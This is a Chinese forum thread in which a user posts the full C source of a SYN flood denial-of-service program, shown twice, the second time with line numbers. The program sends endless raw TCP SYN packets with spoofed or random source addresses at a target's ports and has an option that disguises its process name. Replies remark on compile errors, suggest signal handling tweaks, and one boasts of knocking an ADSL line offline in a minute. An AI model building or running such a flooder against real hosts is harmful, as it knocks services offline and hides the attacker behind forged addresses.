synflood

shangxd

用C编写，是修改别人的作品，具体哪位高手的不大记得了。
还有一个arp欺骗的代码找不到了，sorry。

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <time.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/uio.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/un.h>
#include <sys/select.h>
#include <poll.h>
#include <strings.h>
#include <sys/ioctl.h>
#include <pthread.h>

#define SEQ 0x28376839
#define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))

unsigned long send_seq, ack_seq, srcport;
char flood = 0;
int sock, ssock, curc, cnt;

unsigned short
ip_sum (addr, len)
     u_short *addr;
     int len;
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  while (nleft > 1)
    {
      sum += *w++;
      nleft -= 2;
    }
  if (nleft == 1)
    {
      *(u_char *) (&answer) = *(u_char *) w;
      sum += answer;
    }
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return (answer);
}

void
sig_exit (int crap)
{
#ifndef HEALTHY
  printf ("Signal Caught. Exiting Cleanly.\n");
  exit (crap);
#endif
}

void
sig_segv (int crap)
{
#ifndef NOSEGV
  printf ("Segmentation Violation Caught. Exiting Cleanly.\n");
  exit (crap);
#endif
}

unsigned long
getaddr (char *name)
{
  struct hostent *hep;

  hep = gethostbyname (name);
  if (!hep)
    {
      fprintf (stderr, "Unknown host %s\n", name);
      exit (1);
    }
  return *(unsigned long *) hep->h_addr;
}


void
send_tcp_segment (struct iphdr *ih, struct tcphdr *th, char *data, int dlen)
{
  char buf[65536];
  struct
  {
    unsigned long saddr, daddr;
    char mbz;
    char ptcl;
    unsigned short tcpl;
  }
  ph;

  struct sockaddr_in sin;

  ph.saddr = ih->saddr;
  ph.daddr = ih->daddr;
  ph.mbz = 0;
  ph.ptcl = IPPROTO_TCP;
  ph.tcpl = htons (sizeof (*th) + dlen);

  memcpy (buf, &ph, sizeof (ph));
  memcpy (buf + sizeof (ph), th, sizeof (*th));
  memcpy (buf + sizeof (ph) + sizeof (*th), data, dlen);
  memset (buf + sizeof (ph) + sizeof (*th) + dlen, 0, 4);
  th->check = ip_sum (buf, (sizeof (ph) + sizeof (*th) + dlen + 1) & ~1);

  memcpy (buf, ih, 4 * ih->ihl);
  memcpy (buf + 4 * ih->ihl, th, sizeof (*th));
  memcpy (buf + 4 * ih->ihl + sizeof (*th), data, dlen);
  memset (buf + 4 * ih->ihl + sizeof (*th) + dlen, 0, 4);

  ih->check = ip_sum (buf, (4 * ih->ihl + sizeof (*th) + dlen + 1) & ~1);
  memcpy (buf, ih, 4 * ih->ihl);

  sin.sin_family = AF_INET;
  sin.sin_port = th->dest;
  sin.sin_addr.s_addr = ih->daddr;

  if (sendto
      (ssock, buf, 4 * ih->ihl + sizeof (*th) + dlen, 0, (struct sockaddr *)&sin,
       sizeof (sin)) < 0)
    {
      printf ("Error sending syn packet.\n");
      perror ("");
      exit (1);
    }
}

void
spoof_open (unsigned long my_ip, unsigned long their_ip, unsigned short port)
{
  struct iphdr ih;
  struct tcphdr th;
  char buf[1024];
  struct timeval tv;

  ih.version = 4;
  ih.ihl = 5;
  ih.tos = 0;
  ih.tot_len = sizeof (ih) + sizeof (th);
  ih.id = htons (random ());
  ih.frag_off = 0;
  ih.ttl = 30;
  ih.protocol = IPPROTO_TCP;
  ih.check = 0;
  ih.saddr = my_ip;
  ih.daddr = their_ip;

  th.source = htons (srcport);
  th.dest = htons (port);
  th.seq = htonl (SEQ);
  th.doff = sizeof (th) / 4;
  th.ack_seq = 0;
  th.res1 = 0;
  th.fin = 0;
  th.syn = 1;
  th.rst = 0;
  th.psh = 0;
  th.ack = 0;
  th.urg = 0;
  th.window = htons (65535);
  th.check = 0;
  th.urg_ptr = 0;

  gettimeofday (&tv, 0);

  send_tcp_segment (&ih, &th, "", 0);

  send_seq = SEQ + 1 + strlen (buf);
}

void
upsc ()
{
  int i;
  char schar;
  switch (cnt)
    {
    case 0:
      {
        schar = '|';
        break;
      }
    case 1:
      {
        schar = '/';
        break;
      }
    case 2:
      {
        schar = '-';
        break;
      }
    case 3:
      {
        schar = '\\';
        break;
      }
    case 4:
      {
        schar = '|';
        cnt = 0;
        break;
      }
    }
  printf ("[%c] %d", schar, curc);
  cnt++;
  for (i = 0; i < 26; i++)
    {
      i++;
      curc++;
    }
}
void
init_signals ()
{
  signal (SIGHUP, sig_exit);
  signal (SIGINT, sig_exit);
  signal (SIGQUIT, sig_exit);
  signal (SIGILL, sig_exit);
  signal (SIGTRAP, sig_exit);
  signal (SIGIOT, sig_exit);
  signal (SIGBUS, sig_exit);
  signal (SIGFPE, sig_exit);
  signal (SIGKILL, sig_exit);
  signal (SIGUSR1, sig_exit);
  signal (SIGSEGV, sig_segv);
  signal (SIGUSR2, sig_exit);
  signal (SIGPIPE, sig_exit);
  signal (SIGALRM, sig_exit);
  signal (SIGTERM, sig_exit);
  signal (SIGCHLD, sig_exit);
  signal (SIGCONT, sig_exit);
  signal (SIGSTOP, sig_exit);
  signal (SIGTSTP, sig_exit);
  signal (SIGTTIN, sig_exit);
  signal (SIGTTOU, sig_exit);
  signal (SIGURG, sig_exit);
  signal (SIGXCPU, sig_exit);
  signal (SIGXFSZ, sig_exit);
  signal (SIGVTALRM, sig_exit);
  signal (SIGPROF, sig_exit);
  signal (SIGWINCH, sig_exit);
  signal (SIGIO, sig_exit);
  signal (SIGPWR, sig_exit);
}

int
main (int argc, char **argv)
{
  int i, x, max, floodloop, diff, urip, a, b, c, d;
  unsigned long them, me_fake;
  unsigned lowport, highport;
  char *junk;

  init_signals ();
#ifdef HIDDEN
  for (i = argc - 1; i >= 0; i--)
    memset (argv, 0, strlen (argv));
  strcpy (argv[0], HIDDEN);
#endif

  if (argc < 5)
    {
      printf ("Usage: %s srcaddr dstaddr low high\n", argv[0]);
      printf ("    If srcaddr is 0, random addresses will be used\n\n\n");

      exit (1);
    }
  if (atoi (argv[1]) == 0)
    urip = 1;
  else
    me_fake = getaddr (argv[1]);
  them = getaddr (argv[2]);
  lowport = atoi (argv[3]);
  highport = atoi (argv[4]);
  srandom (time (0));
  ssock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (ssock < 0)
    {
      perror ("socket (raw)");
      exit (1);
    }
  sock = socket (AF_INET, SOCK_RAW, IPPROTO_TCP);
  if (sock < 0)
    {
      perror ("socket");
      exit (1);
    }
  junk = (char *) malloc (1024);
  max = 1500;
  i = 1;
  diff = (highport - lowport);

  if (diff > -1)
    {
      printf
        ("\n\nshangxd.");
      for (i = 1; i > 0; i++)
        {
          srandom ((time (0) + i));
          srcport = getrandom (1, max) + 1000;
          for (x = lowport; x <= highport; x++)
            {
              if (urip == 1)
                {
                  a = getrandom (0, 255);
                  b = getrandom (0, 255);
                  c = getrandom (0, 255);
                  d = getrandom (0, 255);
                  sprintf (junk, "%i.%i.%i.%i", a, b, c, d);
                  me_fake = getaddr (junk);
                }

              spoof_open (me_fake, them, x);
              usleep (300);

              if (!(floodloop = (floodloop + 1) % (diff + 1)))
                {
                  upsc ();
                  fflush (stdout);
                }
            }
        }
    }
  else
    {
      printf ("High port must be greater than Low port.\n");
      exit (1);
    }
  return 0;
}

shangxd

1. 
   
2. #include <sys/types.h>
   
3. #include <sys/socket.h>
   
4. #include <sys/time.h>
   
5. #include <time.h>
   
6. #include <netinet/in.h>
   
7. #include <netinet/ip.h>
   
8. #include <netinet/tcp.h>
   
9. #include <arpa/inet.h>
   
10. #include <errno.h>
    
11. #include <fcntl.h>
    
12. #include <netdb.h>
    
13. #include <signal.h>
    
14. #include <stdio.h>
    
15. #include <stdlib.h>
    
16. #include <string.h>
    
17. #include <sys/stat.h>
    
18. #include <sys/uio.h>
    
19. #include <unistd.h>
    
20. #include <sys/wait.h>
    
21. #include <sys/un.h>
    
22. #include <sys/select.h>
    
23. #include <poll.h>
    
24. #include <strings.h>
    
25. #include <sys/ioctl.h>
    
26. #include <pthread.h>
    
27. 
    
28. #define SEQ 0x28376839
    
29. #define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))
    
30. 
    
31. unsigned long send_seq, ack_seq, srcport;
    
32. char flood = 0;
    
33. int sock, ssock, curc, cnt;
    
34. 
    
35. unsigned short
    
36. ip_sum (addr, len)
    
37.      u_short *addr;
    
38.      int len;
    
39. {
    
40.   register int nleft = len;
    
41.   register u_short *w = addr;
    
42.   register int sum = 0;
    
43.   u_short answer = 0;
    
44. 
    
45.   while (nleft > 1)
    
46.     {
    
47.       sum += *w++;
    
48.       nleft -= 2;
    
49.     }
    
50.   if (nleft == 1)
    
51.     {
    
52.       *(u_char *) (&answer) = *(u_char *) w;
    
53.       sum += answer;
    
54.     }
    
55.   sum = (sum >> 16) + (sum & 0xffff);
    
56.   sum += (sum >> 16);
    
57.   answer = ~sum;
    
58.   return (answer);
    
59. }
    
60. 
    
61. void
    
62. sig_exit (int crap)
    
63. {
    
64. #ifndef HEALTHY
    
65.   printf ("Signal Caught. Exiting Cleanly.\n");
    
66.   exit (crap);
    
67. #endif
    
68. }
    
69. 
    
70. void
    
71. sig_segv (int crap)
    
72. {
    
73. #ifndef NOSEGV
    
74.   printf ("Segmentation Violation Caught. Exiting Cleanly.\n");
    
75.   exit (crap);
    
76. #endif
    
77. }
    
78. 
    
79. unsigned long
    
80. getaddr (char *name)
    
81. {
    
82.   struct hostent *hep;
    
83. 
    
84.   hep = gethostbyname (name);
    
85.   if (!hep)
    
86.     {
    
87.       fprintf (stderr, "Unknown host %s\n", name);
    
88.       exit (1);
    
89.     }
    
90.   return *(unsigned long *) hep->h_addr;
    
91. }
    
92. 
    
93. 
    
94. void
    
95. send_tcp_segment (struct iphdr *ih, struct tcphdr *th, char *data, int dlen)
    
96. {
    
97.   char buf[65536];
    
98.   struct
    
99.   {
    
100.     unsigned long saddr, daddr;
     
101.     char mbz;
     
102.     char ptcl;
     
103.     unsigned short tcpl;
     
104.   }
     
105.   ph;
     
106. 
     
107.   struct sockaddr_in sin;
     
108. 
     
109.   ph.saddr = ih->saddr;
     
110.   ph.daddr = ih->daddr;
     
111.   ph.mbz = 0;
     
112.   ph.ptcl = IPPROTO_TCP;
     
113.   ph.tcpl = htons (sizeof (*th) + dlen);
     
114. 
     
115.   memcpy (buf, &ph, sizeof (ph));
     
116.   memcpy (buf + sizeof (ph), th, sizeof (*th));
     
117.   memcpy (buf + sizeof (ph) + sizeof (*th), data, dlen);
     
118.   memset (buf + sizeof (ph) + sizeof (*th) + dlen, 0, 4);
     
119.   th->check = ip_sum (buf, (sizeof (ph) + sizeof (*th) + dlen + 1) & ~1);
     
120. 
     
121.   memcpy (buf, ih, 4 * ih->ihl);
     
122.   memcpy (buf + 4 * ih->ihl, th, sizeof (*th));
     
123.   memcpy (buf + 4 * ih->ihl + sizeof (*th), data, dlen);
     
124.   memset (buf + 4 * ih->ihl + sizeof (*th) + dlen, 0, 4);
     
125. 
     
126.   ih->check = ip_sum (buf, (4 * ih->ihl + sizeof (*th) + dlen + 1) & ~1);
     
127.   memcpy (buf, ih, 4 * ih->ihl);
     
128. 
     
129.   sin.sin_family = AF_INET;
     
130.   sin.sin_port = th->dest;
     
131.   sin.sin_addr.s_addr = ih->daddr;
     
132. 
     
133.   if (sendto
     
134.       (ssock, buf, 4 * ih->ihl + sizeof (*th) + dlen, 0, (struct sockaddr *)&sin,
     
135.        sizeof (sin)) < 0)
     
136.     {
     
137.       printf ("Error sending syn packet.\n");
     
138.       perror ("");
     
139.       exit (1);
     
140.     }
     
141. }
     
142. 
     
143. void
     
144. spoof_open (unsigned long my_ip, unsigned long their_ip, unsigned short port)
     
145. {
     
146.   struct iphdr ih;
     
147.   struct tcphdr th;
     
148.   char buf[1024];
     
149.   struct timeval tv;
     
150. 
     
151.   ih.version = 4;
     
152.   ih.ihl = 5;
     
153.   ih.tos = 0;
     
154.   ih.tot_len = sizeof (ih) + sizeof (th);
     
155.   ih.id = htons (random ());
     
156.   ih.frag_off = 0;
     
157.   ih.ttl = 30;
     
158.   ih.protocol = IPPROTO_TCP;
     
159.   ih.check = 0;
     
160.   ih.saddr = my_ip;
     
161.   ih.daddr = their_ip;
     
162. 
     
163.   th.source = htons (srcport);
     
164.   th.dest = htons (port);
     
165.   th.seq = htonl (SEQ);
     
166.   th.doff = sizeof (th) / 4;
     
167.   th.ack_seq = 0;
     
168.   th.res1 = 0;
     
169.   th.fin = 0;
     
170.   th.syn = 1;
     
171.   th.rst = 0;
     
172.   th.psh = 0;
     
173.   th.ack = 0;
     
174.   th.urg = 0;
     
175.   th.window = htons (65535);
     
176.   th.check = 0;
     
177.   th.urg_ptr = 0;
     
178. 
     
179.   gettimeofday (&tv, 0);
     
180. 
     
181.   send_tcp_segment (&ih, &th, "", 0);
     
182. 
     
183.   send_seq = SEQ + 1 + strlen (buf);
     
184. }
     
185. 
     
186. void
     
187. upsc ()
     
188. {
     
189.   int i;
     
190.   char schar;
     
191.   switch (cnt)
     
192.     {
     
193.     case 0:
     
194.       {
     
195.         schar = '|';
     
196.         break;
     
197.       }
     
198.     case 1:
     
199.       {
     
200.         schar = '/';
     
201.         break;
     
202.       }
     
203.     case 2:
     
204.       {
     
205.         schar = '-';
     
206.         break;
     
207.       }
     
208.     case 3:
     
209.       {
     
210.         schar = '\\';
     
211.         break;
     
212.       }
     
213.     case 4:
     
214.       {
     
215.         schar = '|';
     
216.         cnt = 0;
     
217.         break;
     
218.       }
     
219.     }
     
220.   printf ("[%c] %d", schar, curc);
     
221.   cnt++;
     
222.   for (i = 0; i < 26; i++)
     
223.     {
     
224.       i++;
     
225.       curc++;
     
226.     }
     
227. }
     
228. void
     
229. init_signals ()
     
230. {
     
231.   signal (SIGHUP, sig_exit);
     
232.   signal (SIGINT, sig_exit);
     
233.   signal (SIGQUIT, sig_exit);
     
234.   signal (SIGILL, sig_exit);
     
235.   signal (SIGTRAP, sig_exit);
     
236.   signal (SIGIOT, sig_exit);
     
237.   signal (SIGBUS, sig_exit);
     
238.   signal (SIGFPE, sig_exit);
     
239.   signal (SIGKILL, sig_exit);
     
240.   signal (SIGUSR1, sig_exit);
     
241.   signal (SIGSEGV, sig_segv);
     
242.   signal (SIGUSR2, sig_exit);
     
243.   signal (SIGPIPE, sig_exit);
     
244.   signal (SIGALRM, sig_exit);
     
245.   signal (SIGTERM, sig_exit);
     
246.   signal (SIGCHLD, sig_exit);
     
247.   signal (SIGCONT, sig_exit);
     
248.   signal (SIGSTOP, sig_exit);
     
249.   signal (SIGTSTP, sig_exit);
     
250.   signal (SIGTTIN, sig_exit);
     
251.   signal (SIGTTOU, sig_exit);
     
252.   signal (SIGURG, sig_exit);
     
253.   signal (SIGXCPU, sig_exit);
     
254.   signal (SIGXFSZ, sig_exit);
     
255.   signal (SIGVTALRM, sig_exit);
     
256.   signal (SIGPROF, sig_exit);
     
257.   signal (SIGWINCH, sig_exit);
     
258.   signal (SIGIO, sig_exit);
     
259.   signal (SIGPWR, sig_exit);
     
260. }
     
261. 
     
262. int
     
263. main (int argc, char **argv)
     
264. {
     
265.   int i, x, max, floodloop, diff, urip, a, b, c, d;
     
266.   unsigned long them, me_fake;
     
267.   unsigned lowport, highport;
     
268.   char *junk;
     
269. 
     
270.   init_signals ();
     
271. #ifdef HIDDEN
     
272.   for (i = argc - 1; i >= 0; i--)
     
273.     memset (argv[i], 0, strlen (argv[i]));
     
274.   strcpy (argv[0], HIDDEN);
     
275. #endif
     
276. 
     
277.   if (argc < 5)
     
278.     {
     
279.       printf ("Usage: %s srcaddr dstaddr low high\n", argv[0]);
     
280.       printf ("    If srcaddr is 0, random addresses will be used\n\n\n");
     
281. 
     
282.       exit (1);
     
283.     }
     
284.   if (atoi (argv[1]) == 0)
     
285.     urip = 1;
     
286.   else
     
287.     me_fake = getaddr (argv[1]);
     
288.   them = getaddr (argv[2]);
     
289.   lowport = atoi (argv[3]);
     
290.   highport = atoi (argv[4]);
     
291.   srandom (time (0));
     
292.   ssock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW);
     
293.   if (ssock < 0)
     
294.     {
     
295.       perror ("socket (raw)");
     
296.       exit (1);
     
297.     }
     
298.   sock = socket (AF_INET, SOCK_RAW, IPPROTO_TCP);
     
299.   if (sock < 0)
     
300.     {
     
301.       perror ("socket");
     
302.       exit (1);
     
303.     }
     
304.   junk = (char *) malloc (1024);
     
305.   max = 1500;
     
306.   i = 1;
     
307.   diff = (highport - lowport);
     
308. 
     
309.   if (diff > -1)
     
310.     {
     
311.       printf
     
312.         ("\n\nshangxd.");
     
313.       for (i = 1; i > 0; i++)
     
314.         {
     
315.           srandom ((time (0) + i));
     
316.           srcport = getrandom (1, max) + 1000;
     
317.           for (x = lowport; x <= highport; x++)
     
318.             {
     
319.               if (urip == 1)
     
320.                 {
     
321.                   a = getrandom (0, 255);
     
322.                   b = getrandom (0, 255);
     
323.                   c = getrandom (0, 255);
     
324.                   d = getrandom (0, 255);
     
325.                   sprintf (junk, "%i.%i.%i.%i", a, b, c, d);
     
326.                   me_fake = getaddr (junk);
     
327.                 }
     
328. 
     
329.               spoof_open (me_fake, them, x);
     
330.               usleep (300);
     
331. 
     
332.               if (!(floodloop = (floodloop + 1) % (diff + 1)))
     
333.                 {
     
334.                   upsc ();
     
335.                   fflush (stdout);
     
336.                 }
     
337.             }
     
338.         }
     
339.     }
     
340.   else
     
341.     {
     
342.       printf ("High port must be greater than Low port.\n");
     
343.       exit (1);
     
344.     }
     
345.   return 0;
     
346. }
     

复制代码

incarnation

编译不能通过！！?

_z_

so long:p

dancingpig

根本可以考虑不需要端口范围的
你机器够nb，宽带够强健
一个端口就可以把对方机器搞定了
我那synflood程序测试，cpu2.4+512mb，带宽多少忘记
1分钟就把adsl（1m）的搞断线了

incarnation

对信号相同的处理可以归为一个信号集

rorot

SYN攻击, "杀敌一万，自损八千"，晕~